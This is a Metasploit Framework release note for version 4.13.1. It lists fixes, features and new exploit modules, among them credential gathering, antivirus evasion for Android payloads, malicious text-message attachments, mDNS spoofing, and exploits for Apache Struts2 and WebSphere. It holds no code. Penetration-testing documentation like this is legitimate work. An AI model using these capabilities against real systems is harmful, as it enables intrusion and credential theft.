• 4.13.1 Product Update 2017-03-23

    • Bugs Fixed

      • PR 7967 - The HW Bridge now displays human-readable info/details for Diagnostic Trouble Codes that are being reported by a vehicle.
      • PR 8019 - The post/multi/gather/firefox_creds module now runs better on Kali Linux and deals with directories that contain spaces correctly.
      • PR 8036 - Improvements were made to the run_as_psh module. This module lets you run an executable on a Windows machine as another user to authenticate and run an executable with domain credentials rather than local credentials.
      • PR 8038 - The com.metasploit.meterpreter.AndroidMeterpreter string has been removed from Payload.java because it was being flagged by AV on staged payloads.
      • PR 8056 - The Powershell mixin is now compatible with Python and Windows Meterpreter sessions, which allows modules like post/windows/gather/outlook to work properly.
      • PR 8070 - Some modules now use the `vars_get` parameter to `send_request_cgi` as per `msftidy`.
      • PR 8095 - The command stager in `exploit/windows/ssh/freesshd_authbypass` has been fixed so that it can find the VBS decoder that was moved to the `rex-exploitation` gem.
      • PR 8100 - Fixes and improvements were made to `msfcrawler`.
      • PR 8110 - This fix resolves an issue that prevented process migration through a specified process name from being handled as expected on Windows systems.
      • PR 8116 - This updates the telnet_version scanner to more gracefully handle an TCP reset while scanning hosts.
      • PR 8118 - The rails_secret_deserialization module has been updated to support dash '-' characters in the secret cookie.
      • PR 8119 - The rails_secret_deserialization module has been updated to support period characters in the secret cookie
      • PR 8128 - This fix resolves an error that occurs when canon_iradv_pwd_extract receives an unexpected response from the target host.
      • PR 8135 - Host names are now validated. If the host name is empty, it is set to the IP address.
      • PR 8141 - This fix resolves an issue that caused the `kill` command in Meterpreter to not work as expected.

      Enhancements and Features

      • PR 7835 - A new Windows Local Privilege Escalation exploit template has been added to the framework. It can be used in Visual Studio to create a new exploit that works inside of Metasploit Framework. The goal is to provide exploit developers to reference to follow when they create new exploits.
      • PR 7877 - The mDNS Spoofer module has been added to the framework. It listens for mDNS multicast requests on 5353/UDP for A and AAAA record queries and responds with a spoofed IP address (assuming the request matches our regex). Affected devices include, but are not limited to, Apple products, XBox 360s', routers, printers, etc.
      • PR 7935 - This patch allows the Hardware Bridge to interact with RF transceiver devices which are supported by rfcat. Additionally, two post modules (transmitter and rfpwnon) ported over from RfCatHelpers scripts are included with this patch.
      • PR 7949 - Documentation has been added for the `auxiliary/scanner/nfs/nfsmount` and `auxiliary/scanner/snmp/snmp_login` modules.
      • PR 8037 - Several fixes and improvements were made to priv_migrate (e.g. a migration is already running under SYSTEM and not downgrading a privileged shell).
      • PR 8058 - The Windows Meterpreter reverse_http/s stagers now have a configurable setting delay between connection attempts when the listener is unavailable. The default delay is 5 seconds. The stagers can be configured to continuously connect as well, rather than trying only a fixed number of times.
      • PR 8065 - Capabilities for scanning-and-locating nearby wireless ZigBee networks via the Metasploit HW Bridge has been added to the framework.
      • PR 8071 - Msfconsole can now send text messages that include malicious attachments.
      • PR 8077 - The `srvport` method has been added to `HttpServer`, which allows you to override the displayed `SRVPORT` with the `URIPORT` option.
      • PR 8078 - You can now specify a default resource for `HttpServer` through the use of a parameter to the `start_service` method.
      • PR 8079 - The unauth command exec has been added for dnaLims, as well as a directory traversal auxiliary module.
      • PR 8084 - You can now run the reload and recheck commands together.
      • PR 8088 - The enum_protection gather module for Linux can now report if a target system has getenforce (related to SELinux), aa-status (related to AppArmor), or gradm2 (related to Grsecurity) executables installed.
      • PR 8104 - Visual Improvements were made to the Unicode tree produced by WMAP plugin's `wmap_sites -s` command.
      • PR 8108 - The `-l` option has been added to the `load` command. You can use this option to list available plugins.
      • PR 8117 - The `pgrep` and `pkill` commands have been added the Meterpreter UI, which allows you to search for processes by name and kill them by name. Previously, you had to search for processes using `ps` and `kill` them by their PID.
      • PR 8130 - Documentation for the `winrm_script_exec` module has been added.
      • PR 8132 - Python 3 support has been added for the web_delivery module.
      • PR 8138 - This fix resolves an issue that caused the post/linux/gather/enum_system module to crash the Mettle payload. It also adds initial http/https transport support.

      New Exploits

      • PR 7781 - The IBM WebSphere RCE Java Deserialization Vulnerability exploit has been added to the framework. It exploits a vulnerability (CVE-2015-7450) in IBM's WebSphere Application Server.
      • PR 7956 - The QNAP NAS/NVR Administrator Hash Disclosure exploit has been added to the framework. It exploits combined heap and stack buffer overflows for QNAP NAS and NVR devices to dump the admin (root) shadow hash from memory.
      • PR 8076 - The easy_file_sharing_ftp module has been added to the framework. It performs a directory traversal attack against a vulnerable Easy File Sharing FTP Server and allows you to steal files outside the FTP directory.
      • PR 8086 - The Logsign Remote Command Injection module has been added to the framework. It provides remote exploitation for a command injection vulnerability in Logsign.
      • PR 8103 - An exploit for CVE-2017-5638 has been added to the framework. It targets a vulnerability in Apache Struts2's Jakarta Multipart Parser and allows an attacker to inject malicious code via the HTTP Content-Type header, which results in arbitrary remote code execution.
      • PR 8113 - A buffer overflow exploit for SysGauge 1.5.18 has been added to the framework.